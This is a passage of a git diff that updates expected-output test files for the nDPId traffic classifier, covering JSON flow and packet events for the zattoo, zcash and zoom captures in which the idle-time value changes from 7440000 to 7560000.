+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614851148248,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614851148248,"pkt":"5kBKB+riApXG95NLCABFAAAo4b8AAIAGAAAKZQACCmYAAgt4AFAk9NueJPTfs1AQgAEU6QAAAAAAAAAA"} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614851148248,"flow_last_seen":1614851148248,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":401,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1614851148248,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Zattoo","breed":"Fun","category":"Video"},"http": {"hostname":"zattosecurehd2-f.akamaihd.net","url":"zattosecurehd2-f.akamaihd.net\/crossdomain.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.6; rv:6.0) Gecko\/20100101 Firefox\/6.0"}} +00911{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1614851148233,"flow_last_seen":1614851148238,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1165,"flow_tot_l4_payload_len":3626,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1614851148254,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"}} +00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1614851148248,"flow_last_seen":1614851148254,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":961,"flow_tot_l4_payload_len":8045,"flow_avg_l4_payload_len":383,"midstream":0,"thread_ts_msec":1614851148254,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Zattoo","breed":"Fun","category":"Video"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","packets-captured":32,"packets-processed":32,"total-skipped-flows":0,"total-l4-data-len":11671,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1614851148254} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 32/32 diff --git a/test/results/zcash.pcap.out b/test/results/zcash.pcap.out index 090ff892f..88e62830a 100644 --- a/test/results/zcash.pcap.out +++ b/test/results/zcash.pcap.out @@ -1,12 +1,12 @@ 00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"zcash.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"zcash.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1514196094240} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1514196094240,"flow_last_seen":1514196094240,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1514196094240,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1514196094240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196094240,"pkt":"fmgbW\/gUcIXCQA64CABFAAA8ux1AAEAGRaDAqAJcsiDE2deWI1qAnf85AAAAAKACchAV6gAAAgQFtAQCCApPjruwAAAAAAEDAwc="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1514196094322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196094322,"pkt":"cIXCQA64fmgbW\/gUCABFAAA8AABAADMGDb6yIMTZwKgCXCNa15Yj5r0mgJ3\/OqAScSDZNwAAAgQFtAQCCArshW\/8T467sAEDAwk="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1514196094322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1514196094322,"pkt":"fmgbW\/gUcIXCQA64CABFAAA0ux5AAEAGRafAqAJcsiDE2deWI1qAnf86I+a9J4AQAOV4LAAAAQEICk+Ou8XshW\/8"} -00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196094240,"flow_last_seen":1514196094322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1514196094322,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1514196094240,"flow_last_seen":1514196094240,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1514196094240,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1514196094240,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196094240,"pkt":"fmgbW\/gUcIXCQA64CABFAAA8ux1AAEAGRaDAqAJcsiDE2deWI1qAnf85AAAAAKACchAV6gAAAgQFtAQCCApPjruwAAAAAAEDAwc="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1514196094322,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196094322,"pkt":"cIXCQA64fmgbW\/gUCABFAAA8AABAADMGDb6yIMTZwKgCXCNa15Yj5r0mgJ3\/OqAScSDZNwAAAgQFtAQCCArshW\/8T467sAEDAwk="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1514196094322,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1514196094322,"pkt":"fmgbW\/gUcIXCQA64CABFAAA0ux5AAEAGRafAqAJcsiDE2deWI1qAnf86I+a9J4AQAOV4LAAAAQEICk+Ou8XshW\/8"} +00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196094240,"flow_last_seen":1514196094322,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1514196094322,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":88,"source":"zcash.pcap","alias":"nDPId-test","packets-captured":88,"packets-processed":87,"total-skipped-flows":0,"total-l4-data-len":6805,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1514196730496} -00925{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":145,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":145,"flow_first_seen":1514196094240,"flow_last_seen":1514197248783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":11022,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1514197248783,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00925{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":145,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":145,"flow_first_seen":1514196094240,"flow_last_seen":1514197248783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":11022,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1514197248783,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":145,"source":"zcash.pcap","alias":"nDPId-test","packets-captured":145,"packets-processed":145,"total-skipped-flows":0,"total-l4-data-len":11022,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1514197248783} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 145/145 diff --git a/test/results/zoom.pcap.out b/test/results/zoom.pcap.out index 17275e54f..ebb13d9eb 100644 --- a/test/results/zoom.pcap.out +++ b/test/results/zoom.pcap.out @@ -1,22 +1,22 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"zoom.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1569520466080} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466080,"flow_last_seen":1569520466080,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1569520466080,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00735{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569520466080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1569520466080,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjbcQAAAQEICiWcznNwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="} -01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466080,"flow_last_seen":1569520466080,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1569520466080,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.googletagmanager.com","ja3":"d78489b860c8bf7838a6ff0b4d131541","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466080,"flow_last_seen":1569520466080,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1569520466080,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00735{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569520466080,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1569520466080,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjbcQAAAQEICiWcznNwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="} +01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466080,"flow_last_seen":1569520466080,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1569520466080,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.googletagmanager.com","ja3":"d78489b860c8bf7838a6ff0b4d131541","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466209,"flow_last_seen":1569520466209,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1569520466209,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569520466209,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1569520466209,"pkt":"AQBeAAD7KDc3AG3ICABFAABJ4i8AAAERNFzAqAF14AAA+xTpFOkANQtaAAAAAAABAAAAAAAAEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAAB"} 00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466209,"flow_last_seen":1569520466209,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1569520466209,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466316,"flow_last_seen":1569520466316,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520466316,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569520466316,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520466316,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+ZLAqAF1p2PXpNZPEVI+PYNCAAAAALAC\/\/9XugAAAgQFtAEDAwUBAQgKJZzPXwAAAAAEAgAA"} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569520466355,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520466355,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADUGBJenY9ekwKgBdRFS1k9+iDZRPj2DQ6AScSDtKQAAAgQFrAQCCArh63OkJZzPXwEDAwc="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569520466355,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520466355,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+Z7AqAF1p2PXpNZPEVI+PYNDfog2UoAQECx8vAAAAQEICiWcz4Xh63Ok"} -01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520466316,"flow_last_seen":1569520466355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520466355,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01133{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520466316,"flow_last_seen":1569520466392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":659,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1569520466392,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"dd4b012f7a008e741554bd0a4ed12920","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466316,"flow_last_seen":1569520466316,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520466316,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569520466316,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520466316,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+ZLAqAF1p2PXpNZPEVI+PYNCAAAAALAC\/\/9XugAAAgQFtAEDAwUBAQgKJZzPXwAAAAAEAgAA"} 